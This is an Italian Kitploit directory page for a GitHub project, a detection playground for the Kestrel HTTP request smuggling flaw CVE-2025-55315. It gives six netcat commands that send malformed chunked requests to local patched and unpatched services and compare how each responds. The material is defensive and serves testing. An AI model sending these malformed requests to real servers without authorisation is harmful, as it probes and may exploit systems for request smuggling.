Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55315-detection-playground — # Playground per sperimentare con diversi comportamenti su Kestrel patchato/non patchato per la vulnerabilità di HTTP smuggling CVE-2025-55315 | Kitploit
Strumenti/GitHubGitHub/nickcopi/cve-2025-55315-detection-playground
Analisi delle VulnerabilitàExploitSicurezza WebPenetration Testing
GitHubnickcopi/cve-2025-55315-detection-playground

CVE-2025-55315-detection-playground

# Playground per sperimentare con diversi comportamenti su Kestrel patchato/non patchato per la vulnerabilità di HTTP smuggling CVE-2025-55315

Vedi Repository
7210 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Ecco alcuni test che possono essere eseguiti contro questi servizi per osservare comportamenti diversi sulle route GET/POST tra le versioni patchate e non patchate di Kestrel.

GET contro versione non patchata (invia 200 e il socket rimane aperto)

root@kitploit:~
printf 'GET / HTTP/1.1\r\nHost: localhost\r\nTransfer-Encoding: chunked\r\nContent-Type: text/plain\r\n\r\n2;\rxx\r\nxy\r\n0\r\n\r\n' | nc localhost 5002

GET contro versione patchata (invia 200 e il socket si chiude)

root@kitploit:~
printf 'GET / HTTP/1.1\r\nHost: localhost\r\nTransfer-Encoding: chunked\r\nContent-Type: text/plain\r\n\r\n2;\rxx\r\nxy\r\n0\r\n\r\n' | nc localhost 5001

POST senza CT richiesto contro versione non patchata (invia 200 e il socket rimane aperto)

root@kitploit:~
printf 'POST / HTTP/1.1\r\nHost: localhost\r\nTransfer-Encoding: chunked\r\nContent-Type: text/plain\r\n\r\n2;\rxx\r\nxy\r\n0\r\n\r\n' | nc localhost 5002

POST senza CT richiesto contro versione patchata (invia 400 e il socket si chiude (il processo genera anche un'eccezione gestita relativa a Bad chunk extension))

root@kitploit:~
printf 'POST / HTTP/1.1\r\nHost: localhost\r\nTransfer-Encoding: chunked\r\nContent-Type: text/plain\r\n\r\n2;\rxx\r\nxy\r\n0\r\n\r\n' | nc localhost 5001

POST con CT richiesto contro versione non patchata (invia 415 e il socket rimane aperto)

root@kitploit:~
printf 'POST /ct HTTP/1.1\r\nHost: localhost\r\nTransfer-Encoding: chunked\r\nContent-Type: text/plain\r\n\r\n2;\rxx\r\nxy\r\n0\r\n\r\n' | nc localhost 5002

POST con CT richiesto contro versione patchata (invia 415 e il socket si chiude)

root@kitploit:~
printf 'POST /ct HTTP/1.1\r\nHost: localhost\r\nTransfer-Encoding: chunked\r\nContent-Type: text/plain\r\n\r\n2;\rxx\r\nxy\r\n0\r\n\r\n' | nc localhost 5001
Scarica lo strumento